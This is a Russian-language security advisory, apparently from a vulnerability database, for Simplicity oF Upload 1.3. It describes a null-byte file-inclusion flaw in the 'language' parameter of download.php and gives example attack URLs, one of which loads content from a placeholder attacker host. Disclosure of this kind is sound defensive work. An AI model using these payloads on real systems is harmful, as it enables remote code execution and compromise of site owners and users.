| Дата публикации: | 29.07.2005 |
| Дата изменения: | 24.03.2009 |
| Всего просмотров: | 1279 |
| Опасность: | Высокая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Simplicity oF Upload 1.x |
| Уязвимые версии: Simplicity oF Upload 1.3
Описание: Уязвимость существует из-за недостаточной обработки входных данных в параметре language. Злоумышленник может указать специально сформированное значение параметра с нулевым байтом (%00) в конце строки и выполнить произвольные локальные файлы на системе. Пример: http://[target]/simply/download.php?language=upload.php%00Затем злоумышленник может загрузить на систему произвольный файл и выполнить его с привилегиями web сервера. Удаленный пользователь может с помощью специально сформированного URL перенаправить пользователя на целевую страницу. Пример: http://[target]/[path]/download.php?language=http://[attacker]/[evil_page]%00 URL производителя: phpsimplicity.com/scripts.php?id=3 Решение: Установите последнюю версию с сайта производителя. Журнал изменений: |
|
| Ссылки: | Simplicity OF Upload 1.3 (possibly prior versons) remote code execution & cross site scripting |